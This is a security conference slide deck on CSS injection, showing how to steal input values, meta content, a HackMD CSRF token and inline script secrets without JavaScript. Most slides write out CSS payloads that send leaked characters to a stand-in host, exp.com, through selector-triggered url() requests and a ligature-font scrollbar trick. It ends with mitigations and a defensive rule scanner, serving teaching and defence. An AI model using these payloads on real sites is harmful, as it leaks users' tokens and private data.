Slide 1

Attacking web without JS CSS Injection Huli from Cymetrics / OneInfinity @ CYBERSEC 2022

Slide 2

About Huli
• Security Researcher at Cymetrics / OneInfinity
• CTF player at Water Paddler
• https://blog.huli.tw/

Slide 3

Front-end Security

Slide 4

Front-end Security => XSS (Cross-Site Scripting)

Slide 5

Front-end Security => XSS (Cross-Site Scripting)

Slide 6

IE7 (15 years ago)

Slide 7

CSS injection => Steal data via CSS

Slide 8

CSS injection => Steal data via CSS How?

Slide 9

input[value^="a"] {
  background: url("//exp.com?a");
}

Slide 10

CSS selectors

input[value^="a"]  /* prefix */
input[value$="a"]  /* suffix */
input[value*="a"]  /* contains */

Slide 11

Steal input value

Slide 12

Steal input value

input[value^="a"] {
  background: url("//exp.com?a");
}

Slide 13

Steal input value

input[value^="a"] + input {
  background: url("//exp.com?a");
}

Slide 14

Steal input value

Slide 15

:has() to the rescue

form:has(input[value^="a"]) {
  background: url("//exp.com?a");
}

Slide 16

No content

Slide 17

Steal meta content

Slide 18

Steal meta content

meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 19

Steal meta content

meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 20

Steal meta content

meta {
  display: block;
}
meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 21

Steal meta content

meta {
  display: block;
}
meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 22

Steal meta content

meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 23

Steal meta content

meta, head {
  display: block;
}
meta[content^="a"] {
  background: url(//exp.com?a);
}

Slide 24

No content

Slide 25

No content

Slide 26

Steal HackMD CSRF token

Slide 27

Steal HackMD CSRF token

Slide 28

Steal HackMD CSRF token

(Diagram labels: HackMD Server)

Slide 29

Steal HackMD CSRF token

(Diagram labels: HackMD Server; server?token=a)

Slide 30

Steal HackMD CSRF token

(Diagram labels: HackMD Server; server?token=a; Update content and)

Slide 31

Steal HackMD CSRF token

(Diagram labels: HackMD Server; server?token=ab; Update content and)

Slide 32

Demo

Slide 33

Steal CSRF token != CSRF 😢

Slide 34

Steal any content

var secret = "abc123";

Is it possible?

Slide 35

ligature

https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

Slide 36

ligature

Slide 37

ligature + scroll bar

script {
  width: 300px;
  display: block;
  font-family: "leak";
  white-space: nowrap;
  overflow-x: auto;
}
script::-webkit-scrollbar {
  background: blue;
}
script::-webkit-scrollbar:horizontal {
  background: url(https://exp.com?a);
}

Slide 38

ligature + scroll bar

Slide 39

Mitigation
• Sanitization
• Content Security Policy
  • style-src
  • font-src
• Check origin/referer header
• Same-site cookie
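The Sanitization bullet can be backed by a scan of any stylesheet a user is allowed to supply. The Python below is an added example written for this page, not code from the talk or its references: `find_exfil_rules`, its regexes and `SAMPLE_CSS` are constructed here, and it flags the three rule shapes the earlier slides rely on (attribute-substring selectors, scrollbar pseudo-elements, external fonts) whenever they also request an external origin.

```python
import re

# Added defensive example (not from the talk): flag stylesheet rules that pair
# a data-dependent selector with a request to another origin, the common shape
# of every exfiltration rule on the preceding slides.

# Attribute-substring selectors that test one character of a value at a time,
# e.g. input[value^="a"] or meta[content^="a"], also when nested in :has(...).
ATTR_SUBSTRING = re.compile(r'\[\s*[\w-]+\s*[\^$*]=\s*["\']?[^"\'\]]*["\']?\s*\]')
# url() pointing at another origin: scheme-relative "//" or absolute http(s).
EXTERNAL_URL = re.compile(r'url\(\s*["\']?\s*(?:https?:)?//', re.IGNORECASE)
# Scrollbar pseudo-elements used by the ligature + scroll bar technique.
SCROLLBAR = re.compile(r'::-webkit-scrollbar', re.IGNORECASE)
# One flat "selector { declarations }" rule; nested at-rules are not handled.
RULE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.DOTALL)


def find_exfil_rules(css: str) -> list:
    """Return [(selector, reason), ...] for rules that should be blocked or reviewed."""
    findings = []
    for m in RULE.finditer(css):
        selector, body = m.group(1).strip(), m.group(2)
        external = EXTERNAL_URL.search(body) is not None
        if selector.lower().startswith("@font-face") and external:
            findings.append((selector, "external font (possible ligature font)"))
        elif ATTR_SUBSTRING.search(selector) and external:
            findings.append((selector, "attribute-substring selector + external url()"))
        elif SCROLLBAR.search(selector) and external:
            findings.append((selector, "scrollbar pseudo-element + external url()"))
    return findings


# Constructed sample: the deck's rules mixed with two benign ones that must pass.
SAMPLE_CSS = """
.btn { background: url(/img/btn.png); }
a[href^="http"] { color: red; }
input[value^="a"] { background: url("//exp.com?a"); }
form:has(input[value^="a"]) { background: url("//exp.com?a"); }
meta, head { display: block; }
meta[content^="a"] { background: url(//exp.com?a); }
script::-webkit-scrollbar { background: blue; }
script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
"""

if __name__ == "__main__":
    for selector, reason in find_exfil_rules(SAMPLE_CSS):
        print(f"{reason}: {selector}")
```

A scan like this complements, rather than replaces, the CSP bullets: `style-src` and `font-src` still decide which origins a rule may fetch from at all.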

Slide 40

Reference
1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-web-application/
5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
6. https://github.com/masatokinugawa/css-exfiltration-svg-font/

Slide 41

Q&A